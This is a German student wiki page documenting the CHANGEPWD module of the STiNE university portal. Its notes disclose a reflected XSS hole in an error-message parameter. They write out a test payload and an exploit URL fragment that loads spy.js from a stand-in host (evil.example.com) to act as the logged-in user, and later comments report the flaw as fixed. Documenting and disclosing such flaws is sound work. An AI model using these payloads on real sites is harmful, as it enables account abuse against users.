STiNE-Modul CHANGEPWD

Aus Fachschaft_Informatik
Zur Navigation springen Zur Suche springen

Beschreibung[Bearbeiten]

Dieses Programm zeigt das Formular an, mit dem man sein Kennwort/Sicherheitsfrage ändern kann. Die eingegeben Daten werden an CHANGEPWD_CHK weitergeleitet.

Parameter[Bearbeiten]

  1. sessionno (15N)
  2. menuid (6N)
  3. ? (A): anscheinend soll hiermit die angezeigte Fehlermeldung spezifiziert werden. Siehe Notizen.

Notizen[Bearbeiten]

All das was hinter -A im dritten Parameter steht, wird in schöner roter Schrift nach fett gedrucktem "Fehler:" in die HTML geschrieben. Ob das ein ungewollter Nebeneffekt bei falscher Parametereingabe oder schlicht schlampige PRogrammierung (Fehlermeldung als Parameter?!) ist, weiß ich nicht. Aber dieser "Fehler" ist mMn eh total uninteressant. - uninteressant? Versuch -A%3Cscript%3Ealert('xss');%3C/script%3E

Ausnutzen lässt sich das ganze mit -A<script%20src="http://evil.example.com/spy.js"></script>. Der Code in spy.js kann dann alle Aktionen ausführen, die ein angemeldeter Benutzer auch ausführen kann. Harmlos wäre ein automatisches Ausloggen, kritischer das Abmelden von Veranstaltungen.

Thomas von der Uni Mainz schrieb:

Als ich am naechsten Morgen die Ergaenzung der URL um den
Javascript-Befehl vorgefuehrt habe, war der Administrator ziemlich
betroffen. Er wollte den Fehler umgehend den Datenlotsen melden. Kannst
du nachschauen, ob der Fehler noch existiert? Es waere sehr interessant
zu sehen, wie schnell der Fehler behoben wird.

Der Fehler zeigte auch eindeutig, dass es keinen
Applikationlevelfirewall *vor* oder *auf* dem Webserver gibt (zumindest
keinen der funktioniert ;-) ).

Leider gehts immer noch :D

Nun gehts nicht mehr, jedenfalls seh ichs nicht mehr. Auch haben die Jungs von GET auf POST gewechselt . o O ( Ob das Sicherheit bringt? ) - Justus, 2007-06-26

Es müsste noch einen Parameter geben, mit dem man angeben können muss gleichzeitig PW und Sicherheitsfrage zu ändern ohne dass man zwei TANS braucht. Leider kam das nur beim ersten Einloggen (18.10.2006, Tobias Zwick) - Also es gibt so ein Parameter mit dem namen 'changeBoth'. Fuer mich, da ich noch beim 'ersten' Einloggen bin, steht der auf 'b'. Vielleicht steht bei dir was anderes? - Justus, 2007-06-26